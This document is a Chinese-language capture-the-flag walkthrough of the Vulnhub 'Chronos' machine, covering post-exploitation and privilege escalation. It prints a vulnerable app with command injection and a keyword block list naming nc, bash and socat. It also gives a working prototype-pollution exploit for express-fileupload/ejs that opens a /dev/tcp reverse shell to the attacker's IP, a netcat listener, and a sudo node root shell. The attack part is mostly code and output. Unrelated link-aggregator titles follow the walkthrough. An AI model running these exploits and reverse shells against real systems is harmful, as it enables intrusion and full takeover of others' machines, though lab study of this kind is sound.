www-data@chronos:/home$ cd imera
cd imera
www-data@chronos:/home/imera$ ls
ls
user.txt
- 我们发现一个名为
imera的用户 - 在
imera目录中发现有一个user.txt - 但我们没有权限查看
简单的信息收集完后,下一步,我们应该尝试提权,我们可以回到最初的目录文件简单查看一番
www-data@chronos:/opt/chronos$ ls -alh
ls -alh
total 60K
drwxr-xr-x 3 www-data www-data 4.0K Oct 26 01:34 .
drwxr-xr-x 4 root root 4.0K Jul 30 2021 ..
-rw-r--r-- 1 www-data www-data 1.4K Aug 3 2021 app.js
-rw-r--r-- 1 www-data www-data 45 Oct 26 01:36 a.sh
drwxr-xr-x 56 www-data www-data 4.0K Jul 30 2021 node_modules
-rw-r--r-- 1 www-data www-data 97 Jul 30 2021 package.json
-rw-r--r-- 1 www-data www-data 33K Jul 30 2021 package-lock.json
- 我们应该处在某个 Web 应用的目录中,之前端口查看时知道是使用
Node.js技术,可以推断出此程序是其开发的 - 对于 Node.js 应用,我们应该关注
package.json文件,它是管理包依赖已经应用配置信息的文件
探索当前的 Node.js 应用
www-data@chronos:/opt/chronos$ cat package.json
cat package.json
{
"dependencies": {
"bs58": "^4.0.1",
"cors": "^2.8.5",
"express": "^4.17.1"
}
}
dependencies 是一个蕴含依赖包名的数组对象
我们就可以从其引入的三个包下手,查它们存在的漏洞
- bs58 眼熟吗?想到前面的 base58 加密了吗?对于它想提升权限帮助不大
- cors 模块解析 作用 主要用来解决客户端请求与服务端的跨域问题,对于它想提升权限帮助不大
- express 相较于原生的http模块做了较好的扩展工作,让开发者可以高效地进行服务器业务开发,对于有用漏洞就应该存在于此
查看 app.js 了解其运行流程
// created by alienum for Penetration Testing
const express = require('express');
const { exec } = require("child_process");
const bs58 = require('bs58');
const app = express();
const port = 8000;
const cors = require('cors');
app.use(cors());
app.get('/', (req,res) =>{
res.sendFile("/var/www/html/index.html");
});
app.get('/date', (req, res) => {
var agent = req.headers['user-agent'];
var cmd = 'date '; // 开始构建命令语句
const format = req.query.format;
const bytes = bs58.decode(format);
var decoded = bytes.toString();
var concat = cmd.concat(decoded);
if (agent === 'Chronos') {
if (concat.includes('id') || concat.includes('whoami') || concat.includes('python') || concat.includes('nc') || concat.includes('bash') || concat.includes('php') || concat.includes('which') || concat.includes('socat')) {
res.send("Something went wrong");
}
// 执行命令,利用关键
exec(concat, (error, stdout, stderr) => {
if (error) {
console.log(`error: ${error.message}`);
return;
}
if (stderr) {
console.log(`stderr: ${stderr}`);
return;
}
res.send(stdout);
});
}
else{
res.send("Permission Denied");
}
})
app.listen(port,() => {
console.log(`Server running at ${port}`);
})
- 发现之前漏洞注入的关键就在此处
concat变量,是构建的 shell 命令 - 可以是此应用依旧是以此用户创建的,权限有限
我们到上层目录查看一下 /opt 还有没有其他应用
www-data@chronos:/opt/chronos$ ls -alh /opt
ls -alh /opt
total 16K
drwxr-xr-x 4 root root 4.0K Jul 30 2021 .
drwxr-xr-x 23 root root 4.0K Jul 29 2021 ..
drwxr-xr-x 3 www-data www-data 4.0K Oct 26 01:34 chronos
drwxr-xr-x 4 root root 4.0K Aug 3 2021 chronos-v2
www-data@chronos:/opt/chronos$ ls -alh /opt/chronos-v2
ls -alh /opt/chronos-v2
total 20K
drwxr-xr-x 4 root root 4.0K Aug 3 2021 .
drwxr-xr-x 4 root root 4.0K Jul 30 2021 ..
drwxr-xr-x 3 root root 4.0K Aug 3 2021 backend
drwxr-xr-x 3 root root 4.0K Aug 3 2021 frontend
-rw-r--r-- 1 root root 381 Aug 3 2021 index.html
www-data@chronos:/opt/chronos$ ls -alh /opt/chronos-v2/backend
ls -alh /opt/chronos-v2/backend
total 64K
drwxr-xr-x 3 root root 4.0K Aug 3 2021 .
drwxr-xr-x 4 root root 4.0K Aug 3 2021 ..
drwxr-xr-x 71 root root 4.0K Aug 3 2021 node_modules
-rw-r--r-- 1 root root 296 Jul 29 2021 package.json
-rw-r--r-- 1 root root 43K Aug 3 2021 package-lock.json
-rw-r--r-- 1 root root 505 Aug 3 2021 server.js
- 发现存在一个名称与
chronos很像的应用chronos-v2而且它是 root 权限 - 在
/opt/chronos-v2核实雀实是一个 Web 应用,它有两个目录从名称上是后端与前端的意思 - 重点是
backend后端,其中目录结构与/opt/chronos十分相似
分别查看 package.json 和 server.js
{
"name": "some-website",
"version": "1.0.0",
"description": "",
"main": "server.js",
"scripts": {
"start": "node server.js"
},
"author": "",
"license": "ISC",
"dependencies": {
"ejs": "^3.1.5",
"express": "^4.17.1",
"express-fileupload": "^1.1.7-alpha.3"
}
}
const express = require('express');
const fileupload = require("express-fileupload");
const http = require('http')
const app = express();
app.use(fileupload({ parseNested: true }));
app.set('view engine', 'ejs');
app.set('views', "/opt/chronos-v2/frontend/pages");
app.get('/', (req, res) => {
res.render('index')
});
const server = http.Server(app);
const addr = "127.0.0.1"
const port = 8080;
server.listen(port, addr, () => {
console.log('Server listening on ' + addr + ' port ' + port);
})
package.json指明了服务端运作文件是server.js涉及三个模块- ejs 模块是嵌入式 JavaScript 模板引擎
- express 与之前相同
- express-fileupload 模块 express 框架下使用的中间件,用于文件上传
server.js显示运行时监听的是靶机的本地127.0.0.18080 端口
通过网络搜查发现漏洞关键是 express-fileupload 的中,关于漏洞的原博客 https://blog.p6.is/Real-World-JS-1/
其中对漏洞利用的 Python 脚本
import requests
# 是 Kali 的监听端口及IP
cmd = 'bash -c "bash -i &> /dev/tcp/192.168.56.111/5555 0>&1"'
# 其中 IP 与端口是 server.js 中的
# pollute
requests.post(
'http://127.0.0.1:8080',
files = {'__proto__.outputFunctionName': (
None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")
}
)
# execute command
requests.get('http://127.0.0.1:8080')
注意对脚本的内容做修改,并且脚本是在靶机上执行
可以通过在 Kali 上使用 python3 的 http.server 然后在靶机上通过 wget 下载
www-data@chronos:/opt/chronos$ cd /tmp
cd /tmp
www-data@chronos:/tmp$ ls
ls
systemd-private-b18aa97a388a4208b11b80f093956ed0-apache2.service-VKV6aU
systemd-private-b18aa97a388a4208b11b80f093956ed0-systemd-resolved.service-9ejNK3
systemd-private-b18aa97a388a4208b11b80f093956ed0-systemd-timesyncd.service-5S27fr
www-data@chronos:/tmp$ wget http://192.168.56.111/exp.py
wget http://192.168.56.111/exp.py
--2022-10-26 05:18:08-- http://192.168.56.111/exp.py
Connecting to 192.168.56.111:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 391 [text/x-python]
Saving to: ‘exp.py’ 0K 100% 395K=0.001s 2022-10-26 05:18:08 (395 KB/s) - ‘exp.py’ saved [391/391] www-data@chronos:/tmp$ ls
ls
exp.py
systemd-private-b18aa97a388a4208b11b80f093956ed0-apache2.service-VKV6aU
systemd-private-b18aa97a388a4208b11b80f093956ed0-systemd-resolved.service-9ejNK3
systemd-private-b18aa97a388a4208b11b80f093956ed0-systemd-timesyncd.service-5S27fr
在执行脚本前,我们先开起kali 的 netcat 监听
┌──(kali㉿kali)-[~]
└─$ netcat -lvp 5555
listening on [any] 5555 ...
connect to [192.168.56.111] from chronos.local [192.168.56.113] 59462
bash: cannot set terminal process group (777): Inappropriate ioctl for device
bash: no job control in this shell
imera@chronos:/opt/chronos-v2/backend$ ls
ls
node_modules
package.json
package-lock.json
server.js
imera@chronos:/opt/chronos-v2/backend$ cd ~
cd ~
imera@chronos:~$ ls
ls
user.txt
imera@chronos:~$ cat user.txt
cat user.txt
byBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UK
imera@chronos:~$
- 发现获取的是 chronos
- 那么我们可以查看一下之前的 user.txt 文件
看来我们需要进行二段提取,我们通过使用 sudo -l
imera@chronos:~$ sudo -l
sudo -l
Matching Defaults entries for imera on chronos:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User imera may run the following commands on chronos:
(ALL) NOPASSWD: /usr/local/bin/npm *
(ALL) NOPASSWD: /usr/local/bin/node *
- 此处我们可以使用 node 进行提权
使用 sudo node -e 'child_process.spawn("/bin/bash", {stdio: [0, 1, 2]})'
imera@chronos:~$ sudo node -e 'child_process.spawn("/bin/bash", {stdio: [0, 1, 2]})'
<ild_process.spawn("/bin/bash", {stdio: [0, 1, 2]})'
id
uid=0(root) gid=0(root) groups=0(root)
第二个 flag
cd /root
ls
root.txt
cat root.txt
YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK
完成
两个 flag
byBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UK
YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK
解密
o chronos pernaei file mou.
apopse siopi mazeuoume oneira.
靶机: Chronos的更多相关文章
- vulnhub靶场之Chronos:1
准备: 攻击机:虚拟机kali.本机win10. 靶机:Chronos,下载地址:https://download.vulnhub.com/chronos/Chronos.ova,下载后直接vbox打 ...
- Chronos
https://mesos.github.io/chronos/ https://github.com/mesos/chronos https://github.com/mesos/chronos/t ...
- Docker系列之(二):使用Mesos管理Docker集群(Mesos + Marathon + Chronos + Docker)
1. Mesos简介 1.1 Mesos Apache Mesos 是一个分布式系统的管理软件,对集群的资源进行分配和管理. Mesos主要由以下几部分组成: Master: 管理各Slave节点 S ...
- CTF线下防御战 — 让你的靶机变成“铜墙铁壁”
本文首发安全客,未经允许禁止转载.原文链接 一. 前言 随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进 ...
- Ms17-010进行WEB提权之实践下某培训靶机服务器
前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方 ...
- metasploit利用漏洞渗透攻击靶机
1.网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机.这两台计算 ...
- web 攻击靶机解题过程
sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...
- Fowsniff: 1靶机入侵
一.信息收集 1.存活主机扫描 arp-scan -l 发现192.168.1.13是目标靶机的IP地址 2.端口扫描 接下来用nmap神器来扫描目标IP地址,命令如下: root@kali2018 ...
- digitalworld.local: MERCY靶机入侵
0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的 ...
- Moonraker:1靶机入侵
0x01 前言 攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息. Moonraker: 1镜像下载地址: h ...
随机推荐
- Gin 框架的执行流程
Gin框架是一个用Go语言编写的高性能Web框架,它基于httprouter实现,具有快速.简洁和高效的特性. 以下是Gin框架处理HTTP请求的大致执行流程: 1 初始化Gin引擎: 用户创建一个新 ...
- ef.core 事务不回滚的我遇到的一种情况分享
比如有几个Repository:_storeRep,_inventoryRep,_storeItemRep.基类封装有BeginTransaction(): using(var trans=_st ...
- 【U8】bom全阶 点击展开按钮,无法获得叶子子阶
经查看 是因为 子件的失效日期与生效日期是相同一天,延后子件的失效日期就可以在点击展开按钮后,看到子阶bom了.
- Smart - Luogu —— 智能的洛谷
@ 目录 安装 Stylus 谷歌 Edge 安装 Smart - Luogu 使用 尾声 安装 Stylus link 点击推荐下载,获取 crx 文件 谷歌 先点击右上角三个点,再点击扩展程序,然 ...
- SQL 分析与优化神器,验证了真相定律
引言 今天要分享的是一个 SQL 语句分析的神器,它是一个基于 Soar 的开源 sql 分析与优化的 Web 图形化工具.我们在平常分析 SQL 语句,使用最多的方式就是 Explain 工具.了解 ...
- docker——存储配置与管理
docker存储配置与管理 查看docker info [root@hmm overlay2]# docker info Client: Docker Engine - Community Versi ...
- 震惊!docker镜像还有这些知识,你都知道吗?----镜像(一)
镜像操作命令表格 docker image 子命令 docker子命令 功能 docker image build docker build 从Dockerfile开始构建镜像 docker imag ...
- numpy cumsum()函数简介
函数原型:numpy.cumsum(a, axis=None, dtype=None, out=None) 可参考链接:https://docs.scipy.org/doc/numpy-1.10.1/ ...
- CF题解合集
CF 比赛题解合集 目录 CF 比赛题解合集 1952 A. Ntarsis' Set B. Imbalanced Arrays C. Ina of the Mountain D. Miriany a ...
- 剑指Offer-65.矩阵中的路径(C++/Java)
题目: 请设计一个函数,用来判断在一个矩阵中是否存在一条包含某字符串所有字符的路径.路径可以从矩阵中的任意一个格子开始,每一步可以在矩阵中向左,向右,向上,向下移动一个格子.如果一条路径经过了矩阵中的 ...